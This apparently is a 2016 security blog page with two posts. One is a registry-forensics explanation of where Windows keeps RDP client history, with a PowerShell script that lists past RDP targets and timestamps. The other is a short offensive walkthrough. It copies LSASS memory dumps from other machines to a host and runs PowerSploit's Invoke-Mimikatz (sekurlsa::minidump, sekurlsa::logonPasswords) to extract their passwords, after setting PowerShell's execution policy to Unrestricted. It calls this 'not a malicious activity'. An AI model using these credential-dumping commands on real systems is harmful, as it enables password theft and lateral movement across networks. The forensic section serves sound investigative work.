Saturday, 20 August 2016

RDP Access Timestamp - Registry Forensics


How do we know whether system "A" connected to other systems over Remote Desktop in the past?

We can retrieve the IP addresses to which RDP connections were established in the past, along with the timestamp of the last connection.


All machines that were reached over RDP are listed under the following key:

"HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers"

Under it you can see every IP address along with the DOMAIN/USERNAME used to connect to that system via RDP.

If you want to retrieve the date and time of the last modification of these registry keys (which in turn indicates when the RDP connection to that system was last established), then:

Export the registry key as a ".txt" file: the export includes the "Last Write Time" of each key, which is not the case if you export the key as ".reg". That's the trick!
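A script that pulls the same information without the export step, added here as an example (not part of the original post). It assumes Windows PowerShell on the machine being examined, a live HKCU hive for the user of interest, and the UsernameHint value name that mstsc stores under each server subkey.

```powershell
# Added example, not from the original post: enumerate the hosts recorded under
# HKCU\Software\Microsoft\Terminal Server Client\Servers with the UsernameHint
# value stored for each and the subkey's Last Write Time. The PowerShell registry
# provider does not expose key write times, so RegQueryInfoKey is called directly.
Add-Type -Namespace Win32 -Name RegInfo -MemberDefinition @'
[DllImport("advapi32.dll", EntryPoint = "RegQueryInfoKeyW", CharSet = CharSet.Unicode)]
public static extern int RegQueryInfoKey(
    IntPtr hKey, IntPtr lpClass, IntPtr lpcchClass, IntPtr lpReserved,
    IntPtr lpcSubKeys, IntPtr lpcbMaxSubKeyLen, IntPtr lpcbMaxClassLen,
    IntPtr lpcValues, IntPtr lpcbMaxValueNameLen, IntPtr lpcbMaxValueLen,
    IntPtr lpcbSecurityDescriptor, out long lpftLastWriteTime);
'@

function Get-RegKeyLastWriteTime {
    # Returns the key's last write time as UTC; every optional output of
    # RegQueryInfoKey is passed as NULL because only the FILETIME is needed.
    param([Microsoft.Win32.RegistryKey]$Key)
    $z  = [IntPtr]::Zero
    $ft = [long]0
    $rc = [Win32.RegInfo]::RegQueryInfoKey($Key.Handle.DangerousGetHandle(),
        $z, $z, $z, $z, $z, $z, $z, $z, $z, $z, [ref]$ft)
    if ($rc -ne 0) { throw "RegQueryInfoKey failed with status $rc" }
    [DateTime]::FromFileTimeUtc($ft)
}

function Get-RdpClientHistory {
    # One object per remembered RDP target; sort by LastWriteUtc for a timeline.
    $root = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(
        'Software\Microsoft\Terminal Server Client\Servers')
    if (-not $root) { Write-Warning 'No RDP client history under HKCU'; return }
    try {
        foreach ($name in $root.GetSubKeyNames()) {
            $sub = $root.OpenSubKey($name)
            try {
                [PSCustomObject]@{
                    Host         = $name
                    UsernameHint = $sub.GetValue('UsernameHint')
                    LastWriteUtc = Get-RegKeyLastWriteTime -Key $sub
                }
            } finally { $sub.Close() }
        }
    } finally { $root.Close() }
}

Get-RdpClientHistory | Sort-Object LastWriteUtc | Format-Table -AutoSize
```

Last Write Time reflects the most recent modification of the subkey (a new connection or a changed UsernameHint), so it dates the latest use of that target, not the first.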

Retrieve Passwords from LSASS via Powersploit Invoke-Mimikatz


Came across a scenario where I was able to run PowerSploit on one of the machines (HOST) with antivirus.

However, I wanted to crack passwords for other systems!!!

Simply get an LSASS dump from the other machines - not a malicious activity!
Copy all those LSASS dump files to HOST and, using PowerSploit's -Command argument, retrieve passwords from the LSASS dump.

Executing the PowerSploit Invoke-Mimikatz tool to retrieve passwords from an LSASS dump file:


Commands Quick Reference:

  1. Get-ExecutionPolicy
  2. Set-ExecutionPolicy Unrestricted
  3. Import-Module .\powersploit.psm1
  4. Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords"'
Good references:
https://github.com/PowerShellMafia/PowerSploit
https://adsecurity.org/?page_id=1821
https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1
https://www.sans.org/reading-room/whitepapers/forensics/mimikatz-overview-defenses-detection-36780